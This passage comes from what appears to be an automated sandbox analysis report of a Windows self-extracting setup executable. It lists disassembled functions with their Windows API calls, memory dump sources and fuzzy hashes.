                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$DesktopLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 2272707703-0
                                                                                                                • Opcode ID: 1131a1708b74ccad1336aeaf282ed9e93aa14ea3fd261bd180f39a217d07f1f8
                                                                                                                • Instruction ID: 583736b8da9e0b1798ce243969eb572105080746a9121ccc4b00157a2fb63cfa
                                                                                                                • Opcode Fuzzy Hash: 1131a1708b74ccad1336aeaf282ed9e93aa14ea3fd261bd180f39a217d07f1f8
                                                                                                                • Instruction Fuzzy Hash: F6113231201B1273E3331622AC66F2FBA45AF41BA4F05412FF6412B3D2CF9ADC0182AD
                                                                                                                Function 004A23F0 Relevance: 7.6, APIs: 5, Instructions: 51fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000000,0049D320,?,?,?,0049F538,00000862), ref: 004A23F8
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,0049F538,00000862), ref: 004A2418
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,?,0049F538,00000862), ref: 004A2427
                                                                                                                • DeleteFileA.KERNEL32(?,?,?,0049F538,00000862), ref: 004A2432
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Attributes$DeleteValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3580480549-0
                                                                                                                • Opcode ID: af67caa42fa1bf0e3db6daa2d52e0cd557eda17accf9368e2740b43b5b4df8be
                                                                                                                • Instruction ID: 2cb4da9f9ea0590be21f14eb26bf73e0fbb3105d8aac2ae48bbfbcec99787d03
                                                                                                                • Opcode Fuzzy Hash: af67caa42fa1bf0e3db6daa2d52e0cd557eda17accf9368e2740b43b5b4df8be
                                                                                                                • Instruction Fuzzy Hash: 78012132300A216BE2205B2CED48B9F2398EF66760F058022F801DA2E2CBB8D802C15D
                                                                                                                Function 0046CEFA Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 0046CF11
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0046CF27
                                                                                                                  • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC57
                                                                                                                  • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC60
                                                                                                                  • Part of subcall function 004C932E: GetDlgItem.USER32(?,?), ref: 004C933C
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0046CF44
                                                                                                                • LoadIconA.USER32(?,00000073), ref: 0046CF6A
                                                                                                                • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0046CF7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientRect$ScreenWindow$IconItemLoadMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1742658178-0
                                                                                                                • Opcode ID: 822196f13f8cb656c8d958955199ce723ffb2dbe1cc3409ef171392ef32f8350
                                                                                                                • Instruction ID: b69804b3791e15353625e259f97d47b02a376f96a7b1cc483fdcb2e99f951efc
                                                                                                                • Opcode Fuzzy Hash: 822196f13f8cb656c8d958955199ce723ffb2dbe1cc3409ef171392ef32f8350
                                                                                                                • Instruction Fuzzy Hash: FF01B575200B04BFE720AF75DC85F5AB7A8EF44344F01442EF1458A1A2CB65AD058B59
                                                                                                                Function 0049A520 Relevance: 7.5, APIs: 5, Instructions: 33memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,000095B6,7556DF20,00000000,0049D7C5), ref: 0049A534
                                                                                                                • TlsSetValue.KERNEL32(0000001C,00000000), ref: 0049A547
                                                                                                                • GlobalHandle.KERNEL32(00000000), ref: 0049A55A
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0049A563
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0049A56A
                                                                                                                  • Part of subcall function 0049A410: lstrcpy.KERNEL32(?,Extract Progress), ref: 0049A50D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFreeHandleUnlockValuelstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3074214269-0
                                                                                                                • Opcode ID: ad5eafb15232a0ae981ad6d46a1e38cd29695636a21d119ecb29d975e902ee86
                                                                                                                • Instruction ID: 9ecee854548e298bfa894226385df9751f7bea61e9a3219eb00d02fdc470e6e1
                                                                                                                • Opcode Fuzzy Hash: ad5eafb15232a0ae981ad6d46a1e38cd29695636a21d119ecb29d975e902ee86
                                                                                                                • Instruction Fuzzy Hash: A4F037367011706BDA215776BC4CD6B7B58DF957A17064131FE00D6251D7288C064AFD
                                                                                                                Function 004252CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004252D1
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 0042539F
                                                                                                                • __ftol.LIBCMT ref: 004253C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked__ftol$DecrementIncrementlstrlen
                                                                                                                • String ID: 0:R
                                                                                                                • API String ID: 439246406-2078724643
                                                                                                                • Opcode ID: 4ace22e6e435bd80082a95107f97f8161545f24012109938afbb2bf02e46854b
                                                                                                                • Instruction ID: 88ad1fd7d60f6b63740e5e777cc857b1748f885b6aeae587901654c0060e3ac1
                                                                                                                • Opcode Fuzzy Hash: 4ace22e6e435bd80082a95107f97f8161545f24012109938afbb2bf02e46854b
                                                                                                                • Instruction Fuzzy Hash: 5C51DF35904619AADB08F7A5D856FEEBB789F11328F20001FF501762C2EF786B858769
                                                                                                                Function 0046D587 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046D58C
                                                                                                                  • Part of subcall function 00473444: __EH_prolog.LIBCMT ref: 00473449
                                                                                                                  • Part of subcall function 0046D05F: __EH_prolog.LIBCMT ref: 0046D064
                                                                                                                  • Part of subcall function 00416514: __EH_prolog.LIBCMT ref: 00416519
                                                                                                                  • Part of subcall function 0047A500: __EH_prolog.LIBCMT ref: 0047A505
                                                                                                                  • Part of subcall function 0046F10B: __EH_prolog.LIBCMT ref: 0046F110
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: 0:R$C:\temp\SUF_SFX_TEST\$Unknown
                                                                                                                • API String ID: 3243491680-1928702690
                                                                                                                • Opcode ID: e4fb1bd6c68590b33541bbf068c218ebf15c635fbe0dc572e3d93246bc3aa5c8
                                                                                                                • Instruction ID: ee0e627ea49443941414baa93ca625601854cbfb75f8911bf55627c5179cec17
                                                                                                                • Opcode Fuzzy Hash: e4fb1bd6c68590b33541bbf068c218ebf15c635fbe0dc572e3d93246bc3aa5c8
                                                                                                                • Instruction Fuzzy Hash: C1515C74901B40DFD325DF6AC455BDAFBF4AF68304F00885FD4AA93252DBB86608DB22
                                                                                                                Function 0049D0D0 Relevance: 6.2, APIs: 4, Instructions: 211fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?,00000000,755734C0,?,?,0049F538,00000862), ref: 0049D0DC
                                                                                                                • ReadFile.KERNEL32(?,?,00002800,?,00000000,?,?,?,?,?,?,0049F538,00000862), ref: 0049D1B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileReadValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2860046521-0
                                                                                                                • Opcode ID: bce83691af7258c6ddd181c5aab9493d68d409349c01a83e8819e5d424b10e1e
                                                                                                                • Instruction ID: 74201188f66db5d1a599edbd68555f3d84551c747c99bc44ee8d7a9735597e5f
                                                                                                                • Opcode Fuzzy Hash: bce83691af7258c6ddd181c5aab9493d68d409349c01a83e8819e5d424b10e1e
                                                                                                                • Instruction Fuzzy Hash: 89814C75A04B018BE734CF29C880B97BBE5FB94314F14492EE9AAC7741DB78E844CB65
                                                                                                                Function 004D4BBB Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetVersion.KERNEL32(?,?,?,004D4BB6), ref: 004D4C32
                                                                                                                • GetProcessVersion.KERNEL32(00000000,?,?,?,004D4BB6), ref: 004D4C6F
                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004D4C9D
                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004D4CA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorLoadVersion$Process
                                                                                                                • String ID:
                                                                                                                • API String ID: 2246821583-0
                                                                                                                • Opcode ID: 63c28eec8e8f68918e95a50839dc4b8c2e4b9fc552f4e46ba2d9454cc6662674
                                                                                                                • Instruction ID: 0828b1ddfbf284029e20d8154029da2954f13e7f890214ed178ed5048d1aef5d
                                                                                                                • Opcode Fuzzy Hash: 63c28eec8e8f68918e95a50839dc4b8c2e4b9fc552f4e46ba2d9454cc6662674
                                                                                                                • Instruction Fuzzy Hash: 3911BFB0A007608FD3249F3A988462ABBE5FF58705B010E3FE187C6B80D778E4008B44
                                                                                                                Function 004CD838 Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • lstrlen.KERNEL32(?), ref: 004CD845
                                                                                                                • GetWindowTextA.USER32(?,?,00000100), ref: 004CD861
                                                                                                                • lstrcmp.KERNEL32(?,?), ref: 004CD875
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 004CD885
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow$lstrcmplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 330964273-0
                                                                                                                • Opcode ID: 72825d7f2303af83e1cad6d4c026a01b45fe114f740fb695b8645f3f0ac77ac2
                                                                                                                • Instruction ID: 0ca7d9c4626a82e07d22cd078e2f4aea8851ed3f7767d673f1c09d7b5f728a05
                                                                                                                • Opcode Fuzzy Hash: 72825d7f2303af83e1cad6d4c026a01b45fe114f740fb695b8645f3f0ac77ac2
                                                                                                                • Instruction Fuzzy Hash: F7F01C75500018BBCF626F25DC48FDE7BA9FB28390F018135F859E5161D774DA94CBA8
                                                                                                                Function 0047F32A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047F32F
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004C279E: __EH_prolog.LIBCMT ref: 004C27A3
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                  • Part of subcall function 0047A66E: __EH_prolog.LIBCMT ref: 0047A673
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DecrementIncrement
                                                                                                                • String ID: Global include script: %s$Include script:
                                                                                                                • API String ID: 715401920-2954161150
                                                                                                                • Opcode ID: 914fdb55fb3f8319abcd4194c2a1b55ac69d353cac8899fa5c17591a8900a9c6
                                                                                                                • Instruction ID: b40d2e6555e7061d4ac8a5a57c0732e7a36e07d44c82c34504d610a8caa2bdd4
                                                                                                                • Opcode Fuzzy Hash: 914fdb55fb3f8319abcd4194c2a1b55ac69d353cac8899fa5c17591a8900a9c6
                                                                                                                • Instruction Fuzzy Hash: 0B51C670A10218EFCB14DFA4C945FEEB7B4AF14714F14816EE405A7282DB786F48CBA5
                                                                                                                Function 00474120 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00474125
                                                                                                                  • Part of subcall function 004CF94C: __EH_prolog.LIBCMT ref: 004CF951
                                                                                                                  • Part of subcall function 004CF94C: SetRectEmpty.USER32(?), ref: 004CF9D5
                                                                                                                  • Part of subcall function 0041519E: __EH_prolog.LIBCMT ref: 004151A3
                                                                                                                  • Part of subcall function 004744FF: __EH_prolog.LIBCMT ref: 00474504
                                                                                                                  • Part of subcall function 004744FF: GetFileAttributesA.KERNEL32(?,?,?,?,?,004741D2), ref: 004745D5
                                                                                                                  • Part of subcall function 004744FF: ExtractIconA.SHELL32(?,?,00000000), ref: 004745ED
                                                                                                                  • Part of subcall function 004744FF: LoadIconA.USER32(?,00000073), ref: 0047460D
                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004741EC
                                                                                                                  • Part of subcall function 004C764B: wsprintfA.USER32 ref: 004C7681
                                                                                                                  • Part of subcall function 004C764B: GetClassInfoA.USER32(?,-00000058,?), ref: 004C76AC
                                                                                                                  • Part of subcall function 004D015D: LoadMenuA.USER32(?,?), ref: 004D017A
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047FCF1: __EH_prolog.LIBCMT ref: 0047FCF6
                                                                                                                  • Part of subcall function 004C9476: SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Load$IconInterlocked$AttributesClassCursorDecrementEmptyExtractFileIncrementInfoMenuRectTextWindowwsprintf
                                                                                                                • String ID: Setup Application
                                                                                                                • API String ID: 290103600-2584944704
                                                                                                                • Opcode ID: c25369e096fe7d3be7f0efebf4cba972cf1625081253853676dfbc90916f3fb1
                                                                                                                • Instruction ID: cc1ae726476ff2df5a67b642d2c53a851a4056213f42686761d8d7ec8fde6f92
                                                                                                                • Opcode Fuzzy Hash: c25369e096fe7d3be7f0efebf4cba972cf1625081253853676dfbc90916f3fb1
                                                                                                                • Instruction Fuzzy Hash: C1418D74900644EECB01EFAAC945BEEBBF4EF55308F00805FE406A7382DB782A05CB65
                                                                                                                Function 0047A400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047A405
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                • GetFileAttributesA.KERNEL32(?,00510870,?,00510870,?,00000000,/T:,?,00000000,00510870,?,00000000,0000005C), ref: 0047A467
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFileH_prologIncrementInterlocked
                                                                                                                • String ID: %s\%s_%d
                                                                                                                • API String ID: 4080302251-3340698188
                                                                                                                • Opcode ID: 780636cfc3a3b722f2f42d200dbea453ffee486d429f3995186475bfbe94a1dd
                                                                                                                • Instruction ID: c150f966942ce0e8ecb694d8dd581d99532d78f4933b440b9fb8d1704348c63c
                                                                                                                • Opcode Fuzzy Hash: 780636cfc3a3b722f2f42d200dbea453ffee486d429f3995186475bfbe94a1dd
                                                                                                                • Instruction Fuzzy Hash: 0D316C79800249EACB01EFA5C845EEEBB78EF14308F10845EF515A3282D778AB55CB66
                                                                                                                Function 0047A5B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047A5B6
                                                                                                                  • Part of subcall function 004C2FCD: _wctomb_s.LIBCMT ref: 004C2FF5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 0047A721: __EH_prolog.LIBCMT ref: 0047A726
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
